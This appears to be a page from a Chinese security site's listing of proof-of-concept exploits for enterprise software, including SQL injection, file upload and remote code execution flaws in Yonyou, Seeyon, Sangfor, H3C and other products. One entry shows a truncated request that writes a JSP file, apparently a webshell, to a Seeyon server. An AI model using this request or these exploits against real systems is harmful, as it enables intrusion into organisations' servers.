POC 第34页
【2025特殊通用】用友UFIDANC IMetaWebService4BqCloud sqli_秃兔安全

【2025特殊通用】用友UFIDANC IMetaWebService4BqCloud sqli

fofayakit插件 uuidpocyaml懒得验证了  
dreamer292的头像_秃兔安全至尊玉兔dreamer29219天前
0265
【通用】 九思OA upload_l.jsp  任意文件上传_秃兔安全

【通用】 九思OA upload_l.jsp 任意文件上传

fofa 语句poc细节  注意上传的文件名必须是xxxlogin.jsp 字符中有login就可以正常的访问,不能有数字要纯字符yakit 有问题写的插件发的包有问题所以没提供yakit插件nuclei yaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2928个月前
016110
致远在野constDef接囗存在代码执行漏洞_秃兔安全

致远在野constDef接囗存在代码执行漏洞

GET /seeyon/constDefdo?method=newConstDef&constKey=asdasd&constDefine=$demo%20%22;new%20File(%22./webapps/ROOT/1111.jsp%22).write(new%20String(Base64.getDecoder0.decode%22P...
秃兔的头像_秃兔安全至尊玉兔秃兔8个月前
08313
天清汉马vpn任意文件读取_秃兔安全
金和OA_CarCardInfo.aspx_SQL注入漏洞_秃兔安全
H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞_秃兔安全
易宝OA ExecuteSqlForSingle SQL注入漏洞_秃兔安全
深信服-下一代防火墙-RCE_秃兔安全
用友U8 Cloud linkntb存在SQL注入漏洞_秃兔安全
【通用】 泛微-云桥e-Bridge  checkMobile SQL注入漏洞_秃兔安全

【通用】 泛微-云桥e-Bridge checkMobile SQL注入漏洞

fofa语句yakit 插件 uuidpocyakit && nuclei yaml已验证   
dreamer292的头像_秃兔安全至尊玉兔dreamer2928个月前
01126